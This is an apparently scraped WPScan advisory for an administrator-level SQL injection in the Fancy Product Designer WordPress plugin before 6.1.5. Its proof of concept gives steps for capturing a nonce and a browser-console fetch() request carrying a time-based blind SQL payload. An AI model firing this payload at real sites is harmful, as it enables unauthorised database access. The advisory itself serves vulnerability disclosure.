Lucene search

K
wpvulndbIvan SpiridonovWPVDB-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18
HistoryFeb 20, 2024 - 12:00 a.m.

Fancy Product Designer < 6.1.5 - Admin+ SQL Injection

2024-02-2000:00:00
Ivan Spiridonov
wpscan.com
5
sql injection
admin+ module
security vulnerability
wordpress plugin

AI Score

7.4

Confidence

Low

EPSS

0

Percentile

9.0%

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.

PoC

- Log in as an administrator, and visit /wp-admin/. - Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer - Search for “fpd_dismiss_notification” in the page’s source, note down the associated nonce - Send the following fetch() command in your browser’s console, and replace $NONCE with the nonce: fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&amp;filter;_by=ID%2c(select*from(select(sleep(20)))a)&amp;sort;_by=ASC&amp;page;=1&amp;type;=catalog').then(x=&gt;x.text()).then(x=&gt;console.log(x)) Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.

AI Score

7.4

Confidence

Low

EPSS

0

Percentile

9.0%

Related for WPVDB-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18